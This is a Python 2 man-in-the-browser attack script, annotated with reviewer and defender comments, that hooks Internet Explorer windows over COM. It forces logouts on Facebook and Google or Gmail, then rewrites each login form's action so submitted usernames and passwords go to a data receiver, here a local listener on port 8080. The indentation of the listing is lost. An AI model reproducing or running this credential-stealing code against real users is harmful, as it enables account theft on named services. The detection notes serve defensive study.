mitb.py
#!/usr/bin/env python
__author__ = 'kalcho'
# Man in the Browser Attack
import win32com.client
import time
import urlparse
import urllib
# Base URL that the main loop writes into the login form's `action`, so whatever
# the user submits in that form is sent here instead of to the real site.
# In this listing it is a listener on the local machine.
data_receiver = "http://localhost:8080/"
# Per-hostname settings, keyed by the hostname parsed from each window's URL:
#   logout_url        - URL to navigate to in order to end the current session (or None)
#   logout_form       - DOM id of a logout form to submit when no URL is given (or None)
#   login_form_index  - index into Document.forms of the form whose action is rewritten
#   owned             - set to True once the form has been rewritten; such sites are skipped
target_sites = {}
target_sites["www.facebook.com"] = {
"logout_url": None,
"logout_form": "logout_form",
"login_form_index": 0,
"owned": False
}
target_sites["accounts.google.com"] = {
"logout_url": "https://mail.google.com/mail/?logout&hl=en",
"logout_form": None,
"login_form_index": 0,
"owned": False
}
# use the same target for multiple Gmail domains
# (these are aliases of the same dict object, so the "owned" flag is shared by all three)
target_sites["www.gmail.com"] = target_sites["accounts.google.com"]
target_sites["mail.google.com"] = target_sites["accounts.google.com"]
# NOTE(review): this CLSID appears to be the Windows ShellWindows collection, which
# enumerates open shell / Internet Explorer windows over COM - confirm.
# Detection: a script host or other non-browser process instantiating this CLSID and
# then calling Navigate or touching Document on the returned windows is a useful
# signal for endpoint monitoring.
clsid = '{9BA05972-F6A8-11CF-A442-00A0C90A8F39}'
windows = win32com.client.Dispatch(clsid)
# Block until the given browser COM object reports that its page has loaded.
# NOTE(review): indentation was lost in this listing; `return` presumably follows
# the polling loop rather than sitting inside it - confirm against the original file.
# There is no timeout, so a page that never reaches the ready state stalls the caller.
def wait_for_browser(browser):
# wait for the browser to finish loading a page
# (polls every 0.1 s until ReadyState is 4 or the string "complete")
while browser.ReadyState != 4 and browser.ReadyState != "complete":
time.sleep(0.1)
return
# Main polling loop. For every window in the COM collection whose hostname is a key
# of target_sites and not yet marked "owned", it (1) forces a logout, then (2) points
# the login form's action at data_receiver and marks the site "owned".
# NOTE(review): indentation was lost in this listing, so the exact nesting of the
# statements below is inferred from syntax only - confirm against the original file.
# Defender notes: what the user sees is an unexpected logout followed by a normal-looking
# login page; the tell-tale artefact is a login form whose action points at a host
# other than the site's own. Captured passwords are of less use where phishing-resistant
# second factors are enforced.
while True:
for browser in windows:
# urlparse is the Python 2 module name, so this file targets Python 2
url = urlparse.urlparse(browser.LocationUrl)
if url.hostname in target_sites:
# skip sites whose login form has already been rewritten
if target_sites[url.hostname]["owned"]:
continue
# if there is a URL, we can just redirect
if target_sites[url.hostname]["logout_url"]:
browser.Navigate(target_sites[url.hostname]["logout_url"])
wait_for_browser(browser)
else:
# retrieve all elements in the document
full_doc = browser.Document.all
# iterate, looking for the logout form
for i in full_doc:
try:
# find the logout form and submit it
if i.id == target_sites[url.hostname]["logout_form"]:
i.submit()
wait_for_browser(browser)
# bare except: any error on an element (including a missing id) is silently ignored
except:
pass
# now we modify the login form
try:
login_index = target_sites[url.hostname]["login_form_index"]
# the URL-quoted current page address is appended to data_receiver as the path
login_page = urllib.quote(browser.LocationUrl)
browser.Document.forms[login_index].action = "%s%s" % (data_receiver, login_page)
target_sites[url.hostname]["owned"] = True
# bare except: if the form cannot be reached, "owned" is not set and the failure is swallowed
except:
pass
# pause 5 s between polling passes
time.sleep(5)